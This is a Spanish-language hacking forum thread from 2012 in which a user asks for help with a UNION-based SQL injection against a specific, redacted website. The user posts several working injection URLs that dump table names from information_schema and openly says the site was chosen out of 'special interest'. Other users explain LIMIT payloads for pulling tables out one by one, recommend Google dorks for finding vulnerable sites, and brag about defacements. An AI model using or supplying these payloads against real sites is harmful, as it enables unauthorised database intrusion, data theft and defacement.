|
Título: Duda en Inyeccion SQL al ver tablas Publicado por: Søra en 24 Febrero 2012, 17:35 pm Hola a todos estoy probando las SQLi ya que no lo habia echo nunca y tengo una duda he encontrado una pagina vulnerable y ya e sacado el numero de columnas la que es vulnerable pero al pedir la lista de tablas no consigo que me la de entera, siempre me corta la lista, he probado concat(table_name), group_concat(table_name) he probado con limites peor nose... alguna idea?
Esta es la url que e probado: http://www.xxxxxxxx.com/inscripcion.php?id=89%20and%201=0%20union%20all%20select%201,2,3,group_concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables%20limit%201000-- http://www.xxxxxxxx.com/inscripcion.php?id=89%20and%201=0%20union%20all%20select%201,2,3,concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables%20limit%201000-- http://www.xxxxxxxx.com/inscripcion.php?id=89%20and%201=0%20union%20all%20select%201,2,3,group_concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables-- http://www.xxxxxxxx.com/inscripcion.php?id=89%20and%201=0%20union%20all%20select%201,2,3,concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables-- Un saludo Título: Re: Duda en Inyeccion SQL al ver tablas Publicado por: Shell Root en 24 Febrero 2012, 20:51 pm A veces el número de caracteres devueltos son limitados, es decir, por alguna razón devuelve o 1 fila, o 2 filas, etc...
Título: Re: Duda en Inyeccion SQL al ver tablas Publicado por: Søra en 24 Febrero 2012, 21:26 pm Y no puedo hacer nada :S porque jode bastante encontrar la vulnerabilidad y que justo no se vean las tablas buenas :S
Título: Re: Duda en Inyeccion SQL al ver tablas Publicado por: $Edu$ en 24 Febrero 2012, 22:04 pm Para practicarte existen dorks para buscar con google estas vulnerabilidades y alguna encontraras que funcione bien, o tambien existen talleres para practicar, que vendria a ser una web con todas las vulnerabilidades para practicar defaceandola xD
Te digo eso porque yo para lograr mi primer defacing intente con muchas hasta que con una si pude ;) Título: Re: Duda en Inyeccion SQL al ver tablas Publicado por: Søra en 24 Febrero 2012, 22:12 pm Jajaja lo cierto esque ya e echo algun deface pero tenia interes especial en esta web que estoy trabajando ahora....
Título: Re: Duda en Inyeccion SQL al ver tablas Publicado por: $Edu$ en 25 Febrero 2012, 02:13 am Como aclaras en tu primer post de que no habias echo ninguno antes pensaba que querias practicar..
Título: Re: Duda en Inyeccion SQL al ver tablas Publicado por: Shell Root en 25 Febrero 2012, 06:41 am Pero no entiendo, si muestra algunas tablas, podrías usar un limit para sacarlas una por una... (Un poco tedioso, pero es posible automatizarlo)
Título: Re: Duda en Inyeccion SQL al ver tablas Publicado por: Søra en 25 Febrero 2012, 10:44 am entonces sera que no se usar los limits :S alguien me puede echar una mano porque en internet no encuentro nada especifico sobre limits...
Ya esta solucionado me fallaba la sintaxis muchas gracias shell y edu las probare una a una :) Título: Re: Duda en Inyeccion SQL al ver tablas Publicado por: Darioxhcx en 27 Febrero 2012, 18:31 pm +limit+0,1--
de hay vas aumentando +limit+0,1-- +limit+0,2-- +limit+0,3-- |